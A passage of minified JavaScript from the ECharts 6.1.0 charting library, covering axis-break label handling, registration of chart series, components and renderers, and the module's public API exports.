YR(t,e,n){if(!G(n,function(t){return!t})){var i=new Ae;if(ZS(n[0],n[1],i,{direction:-(t?e+Math.PI:e),touchThreshold:0,bidirectional:!1})){var r=[1,0,0,1,0,0];ke(r,r,-e);var o=V(n,function(t){return t.transform?Me([1,0,0,1,0,0],r,t.transform):r}),a=.5;if(g(0)||g(1)){var s=V(n,function(t,e){var n=t.localRect.clone();return n.applyTransform(o[e]),n}),l=new Ae;l.copy(n[0].label).add(n[1].label).scale(.5),l.transform(r);var u=i.clone().transform(r),c=(s[0].x+s[1].x+(u.x>=0?s[0].width:s[1].width)+u.x)/2-l.x,h=Math.min(c,c-u.x),p=Math.max(c,c-u.x);a=(c-(p<0?p:h>0?h:0))/u.x}var d=new Ae,f=new Ae;Ae.scale(d,i,-a),Ae.scale(f,i,1-a),GS(n[0],d),GS(n[1],f)}}function g(t){var e=n[0].localRect,i=new Ae(e[Zh[t]]*o[0][0],e[Zh[t]]*o[0][1]);return Math.abs(i.y)<1e-5}}function XR(t,e){var n={breaks:[]};return E(e.breaks,function(i){if(i){var r=G(t.get("breaks",!0),function(t){return pd().identifyAxisBreak(t,i)});if(r){var o=e.type,a={isExpanded:!!r.isExpanded};r.isExpanded=o===gk||o!==vk&&(o===yk?!r.isExpanded:r.isExpanded),n.breaks.push({start:r.start,end:r.end,isExpanded:!!r.isExpanded,old:a})}}}),n}function jR(){var t;t={adjustBreakLabelPair:YR,buildAxisBreakLine:ZR,rectCoordBuildBreakAxis:UR,updateModelAxisBreak:XR},dk||(dk=t)}_x([function(t){t.registerPainter("canvas",bT)}]),_x([function(t){t.registerPainter("svg",iT)}]),_x([function(t){t.registerChartView(sk),t.registerSeriesModel(wT),t.registerLayout(lk("line",!0)),t.registerVisual({seriesType:"line",reset:function(t){var e=t.getData(),n=t.getModel("lineStyle").getLineStyle();n&&!n.stroke&&(n.stroke=e.getVisual("style").fill),e.setVisual("legendLineStyle",n)}}),t.registerProcessor(t.PRIORITY.PROCESSOR.STATISTIC,hk("line"))},function(t){t.registerChartView(xC),t.registerSeriesModel(pC),t.registerLayout(t.PRIORITY.VISUAL.LAYOUT,sC(Qk)),t.registerLayout(t.PRIORITY.VISUAL.PROGRESSIVE_LAYOUT,function(t){return{seriesType:t,plan:sy(),reset:function(t){if(function(t){return t.coordinateSystem&&"cartesian2d"===t.coordinateSystem.type}(t)){var e=t.getData(),n=t.coordinateSystem,i=n.getBaseAxis(),r=n.getOtherAxis(i),o=e.getDimensionIndex(e.mapDimension(r.dim)),a=e.getDimensionIndex(e.mapDimension(i.dim)),s=t.get("showBackground",!0),l=e.mapDimension(r.dim),u=e.getCalculationInfo("stackResultDimension"),c=Jx(e,l)&&!!e.getCalculationInfo("stackedOnSeries"),h=r.isHorizontal(),p=r.toGlobalCoord(r.dataToCoord(function(t){return t.scale.rawExtentInfo.makeRenderInfo().startValue}(r))),d=lC(t),f=t.get("barMinHeight")||0,g=u&&e.getDimensionIndex(u),v=e.getLayout("size"),y=e.getLayout("offset");return{progress:function(t,e){for(var i,r=t.count,l=d&&zT(3*r),u=d&&s&&zT(3*r),m=d&&zT(r),_=n.master.getRect(),x=h?_.width:_.height,b=e.getStore(),w=0;null!=(i=t.next());){var S=b.get(c?g:o,i),M=b.get(a,i),T=p,k=void 0;c&&(k=+S-b.get(o,i));var C=void 0,I=void 0,D=void 0,A=void 0;if(h){var P=n.dataToPoint([S,M]);c&&(T=n.dataToPoint([k,M])[0]),C=T,I=P[1]+y,D=P[0]-T,A=v,To(D)<f&&(D=(D<0?-1:1)*f)}else P=n.dataToPoint([M,S]),c&&(T=n.dataToPoint([M,k])[1]),C=P[0]+y,I=T,D=v,A=P[1]-T,To(A)<f&&(A=(A<=0?-1:1)*f);d?(l[w]=C,l[w+1]=I,l[w+2]=h?D:A,u&&(u[w]=h?_.x:C,u[w+1]=h?I:_.y,u[w+2]=x),m[i]=i):e.setItemLayout(i,{x:C,y:I,width:D,height:A}),w+=3}d&&e.setLayout({largePoints:l,largeDataIndices:m,largeBackgroundPoints:u,valueAxisHorizontal:h})}}}}}}(Qk)),t.registerProcessor(t.PRIORITY.PROCESSOR.STATISTIC,hk(Qk)),t.registerAction({type:"changeAxisOrder",event:"changeAxisOrder",update:"update"},function(t,e){var n=t.componentType||"series";e.eachComponent({mainType:n,query:t},function(e){t.sortInfo&&e.axis.setCategorySortInfo(t.sortInfo)})}),cC(t)},function(t){t.registerChartView(tI),t.registerSeriesModel(FC),function(t,e){function n(e,n){var i=[];return e.eachComponent({mainType:"series",subType:t,query:n},function(t){i.push(t.seriesIndex)}),i}E([[t+"ToggleSelect","toggleSelect"],[t+"Select","select"],[t+"UnSelect","unselect"]],function(t){e(t[0],function(e,i,r){e=A({},e),r.dispatchAction(A(e,{type:t[1],seriesIndex:n(i,e)}))})})}(EC,t.registerAction),t.registerLayout($C),t.registerProcessor(function(t){return{seriesType:t,reset:function(t,e){var n=e.findComponents({mainType:"legend"});if(n&&n.length){var i=t.getData();i.filterSelf(function(t){for(var e=i.getName(t),r=0;r<n.length;r++)if(!n[r].isSelected(e))return!1;return!0})}}}}(EC)),t.registerProcessor(function(t){return{seriesType:t,reset:function(t,e){var n=t.getData();n.filterSelf(function(t){var e=n.mapDimension("value"),i=n.get(e,t);return!(K(i)&&!isNaN(i)&&i<0)})}}}(EC))},function(t){_x(WI),t.registerSeriesModel(eI),t.registerChartView(oI),t.registerLayout(lk("scatter"))}]),_x([function(t){t.registerComponentModel(CD),t.registerComponentView(XD),t.registerPreprocessor(function(t){var e=t.graphic;Y(e)?e[0]&&e[0].elements?t.graphic=[t.graphic[0]]:t.graphic=[{elements:e}]:e&&!e.elements&&(t.graphic=[{elements:[e]}])})},function(t){_x(wD),t.registerComponentModel(lL),t.registerComponentView(TL),t.registerAction({type:"showTip",event:"showTip",update:"tooltip:manuallyShowTip"},St),t.registerAction({type:"hideTip",event:"hideTip",update:"tooltip:manuallyHideTip"},St)},wD,function(t){_x(zO),_x(UO)},function(t){_x(WI),_x(wD)},function(t){t.registerComponentModel(DL),t.registerComponentView(AL)},function(t){t.registerComponentModel(NL),t.registerComponentView(XL),t.registerPreprocessor(function(t){PL(t.series,"markPoint")&&(t.markPoint=t.markPoint||{})})},function(t){t.registerComponentModel(jL),t.registerComponentView(vO),t.registerPreprocessor(function(t){PL(t.series,"markLine")&&(t.markLine=t.markLine||{})})},function(t){t.registerComponentModel(yO),t.registerComponentView(TO),t.registerPreprocessor(function(t){PL(t.series,"markArea")&&(t.markArea=t.markArea||{})})},function(t){_x(cR),_x(_R)},function(t){t.registerComponentModel(TA),t.registerComponentView(CA),SA("saveAsImage",DA),SA("magicType",LA),SA("dataView",VA),SA("dataZoom",oL),SA("restore",UA),_x(xA)},function(t){t.registerPreprocessor(MR),t.registerVisual(t.PRIORITY.VISUAL.ARIA,SR)},function(t){t.registerComponentModel(TR),t.registerComponentView(kR)}]),_x([function(t){!function(t){function e(t,e){var n=[],i=Ca(e,t);function r(e,r){E(i[e],function(e){E(e.updateAxisBreaks(t).breaks,function(t){var i;n.push(L(((i={})[r]=e.componentIndex,i),t))})})}return r("xAxisModels","xAxisIndex"),r("yAxisModels","yAxisIndex"),r("singleAxisModels","singleAxisIndex"),{eventBreaks:n}}t.registerAction(_k,e),t.registerAction(xk,e),t.registerAction(bk,e)}(t),GR(),jR()}]),t.Axis=wS,t.ChartView=cy,t.ComponentModel=kf,t.ComponentView=ay,t.List=Yx,t.Model=td,t.PRIORITY=r_,t.SeriesModel=Qv,t.color=Mi,t.connect=function(t){if(Y(t)){var e=t;t=null,E(e,function(e){null!=e.group&&(t=e.group)}),t=t||"g_"+K_++,E(e,function(e){e.group=t})}return j_[t]=!0,t},t.dataTool={},t.dependencies={zrender:"6.1.0"},t.disConnect=J_,t.disconnect=Q_,t.dispose=function(t){j(t)?t=X_[t]:t instanceof N_||(t=tx(t)),t instanceof N_&&!t.isDisposed()&&t.dispose()},t.env=r,t.extendChartView=function(t){var e=cy.extend(t);return cy.registerClass(e),e},t.extendComponentModel=function(t){var e=kf.extend(t);return kf.registerClass(e),e},t.extendComponentView=function(t){var e=ay.extend(t);return ay.registerClass(e),e},t.extendSeriesModel=function(t){var e=Qv.extend(t);return Qv.registerClass(e),e},t.format=eS,t.getCoordinateSystemDimensions=function(t){var e=sf.get(t);if(e)return e.getDimensionsInfo?e.getDimensionsInfo():e.dimensions.slice()},t.getInstanceByDom=tx,t.getInstanceById=function(t){return X_[t]},t.getMap=function(t){var e=um("getMap");return e&&e(t)},t.graphic=tS,t.helper=Vw,t.init=function(t,e,n){var i=!(n&&n.ssr);if(i){0;var r=tx(t);if(r)return r;0}var o=new N_(t,e,n);return o.id="ec_"+q_++,X_[o.id]=o,i&&La(t,$_,o.id),D_(o),sm.trigger("afterinit",o),o},t.innerDrawElementOnCanvas=Zm,t.matrix=De,t.number=Qw,t.parseGeoJSON=$w,t.parseGeoJson=$w,t.registerAction=sx,t.registerCoordinateSystem=lx,t.registerCustomSeries=function(t,e){},t.registerLayout=ux,t.registerLoading=dx,t.registerLocale=cd,t.registerMap=fx,t.registerPostInit=rx,t.registerPostUpdate=ox,t.registerPreprocessor=nx,t.registerProcessor=ix,t.registerTheme=ex,t.registerTransform=gx,t.registerUpdateLifecycle=ax,t.registerVisual=cx,t.setCanvasCreator=function(t){h({createCanvas:t})},t.setPlatformAPI=h,t.throttle=_y,t.time=Jw,t.use=_x,t.util=nS,t.vector=Xt,t.version="6.1.0",t.zrUtil=kt,t.zrender=bo,Object.defineProperty(t,"__esModule",{value:!0})});